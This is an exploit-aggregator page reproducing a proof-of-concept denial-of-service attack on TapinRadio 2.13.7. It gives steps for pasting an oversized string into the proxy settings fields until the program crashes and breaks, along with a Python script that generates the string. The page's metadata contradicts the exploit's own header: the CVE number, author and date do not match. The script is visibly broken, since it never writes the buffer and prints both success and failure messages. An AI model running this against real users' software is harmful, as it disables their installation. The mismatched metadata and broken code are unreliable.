TapinRadio 2.13.7 Denial Of Service

CVE Category Price Severity
CVE-2021-44228 CWE-264 Unknown High
Author Risk Exploitation Type Date
s1kr10s High Remote 2020-12-07
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

TapinRadio 2.13.7 Denial Of Service
# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage:
# Software Link:
# Version: 2.13.7 x64
# Tested on: Windows 10 Home x64

# Open the program TapinRadio 
# In Settings select Preferences option
# Click in Miscellaneous and click in Set Application Proxy
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Mikon.txt"
# Paste the content in the field Username and Address and click in OK
# Click in Ok again
# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again
# End :)

buffer = 'K' * 20000

    file = open("Mikon.txt","w")

    print("Archive ready")
    print("Archive no ready")

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum